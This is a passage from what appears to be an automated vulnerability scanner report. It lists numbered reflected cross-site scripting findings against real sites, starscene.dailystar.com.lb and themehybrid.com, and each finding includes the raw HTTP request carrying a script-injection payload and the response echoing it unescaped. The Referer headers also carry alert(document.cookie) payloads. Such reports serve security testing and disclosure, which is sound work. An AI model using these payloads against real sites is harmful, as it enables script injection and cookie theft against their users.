<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js6849a\"><script>alert(1)</script>55d79ba84cf/jquery/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.370. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602d0"><script>alert(1)</script>30db3f8d9ab was submitted in the REST URL parameter 3. This input was echoed as 602d0\"><script>alert(1)</script>30db3f8d9ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery602d0"><script>alert(1)</script>30db3f8d9ab/ui.selectable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:10 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery602d0\"><script>alert(1)</script>30db3f8d9ab/ui.selectable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.371. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.selectable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d72"><script>alert(1)</script>4d7c1edb910 was submitted in the REST URL parameter 4. This input was echoed as 62d72\"><script>alert(1)</script>4d7c1edb910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.selectable.js62d72"><script>alert(1)</script>4d7c1edb910?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.selectable.js62d72\"><script>alert(1)</script>4d7c1edb910?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.372. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cf2"><script>alert(1)</script>5999fd77bde was submitted in the REST URL parameter 1. This input was echoed as a1cf2\"><script>alert(1)</script>5999fd77bde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesa1cf2"><script>alert(1)</script>5999fd77bde/js/jquery/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:45 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesa1cf2\"><script>alert(1)</script>5999fd77bde/js/jquery/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.373. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>2c5de9ea418 was submitted in the REST URL parameter 2. This input was echoed as ff882\"><script>alert(1)</script>2c5de9ea418 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsff882"><script>alert(1)</script>2c5de9ea418/jquery/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsff882\"><script>alert(1)</script>2c5de9ea418/jquery/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.374. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd76"><script>alert(1)</script>5b57586f4c1 was submitted in the REST URL parameter 3. This input was echoed as 1fd76\"><script>alert(1)</script>5b57586f4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery1fd76"><script>alert(1)</script>5b57586f4c1/ui.sortable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery1fd76\"><script>alert(1)</script>5b57586f4c1/ui.sortable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.375. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.sortable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f4ac"><script>alert(1)</script>193d9090e81 was submitted in the REST URL parameter 4. This input was echoed as 5f4ac\"><script>alert(1)</script>193d9090e81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.sortable.js5f4ac"><script>alert(1)</script>193d9090e81?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.sortable.js5f4ac\"><script>alert(1)</script>193d9090e81?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.376. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80693"><script>alert(1)</script>4b256f9809b was submitted in the REST URL parameter 1. This input was echoed as 80693\"><script>alert(1)</script>4b256f9809b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes80693"><script>alert(1)</script>4b256f9809b/js/swfobject.js?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:25 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes80693\"><script>alert(1)</script>4b256f9809b/js/swfobject.js?ver=2.1'; }); return true;" >
...[SNIP]...

4.377. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1994"><script>alert(1)</script>da72374b897 was submitted in the REST URL parameter 2. This input was echoed as a1994\"><script>alert(1)</script>da72374b897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsa1994"><script>alert(1)</script>da72374b897/swfobject.js?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:22 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/jsa1994\"><script>alert(1)</script>da72374b897/swfobject.js?ver=2.1'; }); return true;" >
...[SNIP]...

4.378. http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96823"><script>alert(1)</script>d03062193c6 was submitted in the REST URL parameter 3. This input was echoed as 96823\"><script>alert(1)</script>d03062193c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/swfobject.js96823"><script>alert(1)</script>d03062193c6?ver=2.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=94c327db8dac8831137617a3a9c65f11
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/swfobject.js96823\"><script>alert(1)</script>d03062193c6?ver=2.1'; }); return true;" >
...[SNIP]...

4.379. http://themehybrid.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a"><script>alert(1)</script>63682048419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d428a\"><script>alert(1)</script>63682048419 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d428a"><script>alert(1)</script>63682048419=1 HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.2.10.1295921862;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:24:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11026

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?d428a\"><script>alert(1)</script>63682048419=1"/>
...[SNIP]...

4.380. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b433f"><script>alert(1)</script>e14ba5f4f8a was submitted in the REST URL parameter 1. This input was echoed as b433f\"><script>alert(1)</script>e14ba5f4f8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogb433f"><script>alert(1)</script>e14ba5f4f8a/wp-content/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:28 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogb433f\"><script>alert(1)</script>e14ba5f4f8a/wp-content/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.381. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://themehybrid.com
Path:	/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d5a"><script>alert(1)</script>28e0a6329e5 was submitted in the REST URL parameter 2. This input was echoed as e1d5a\"><script>alert(1)</script>28e0a6329e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente1d5a"><script>alert(1)</script>28e0a6329e5/plugins/cleaner-gallery/cleaner-gallery.css?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
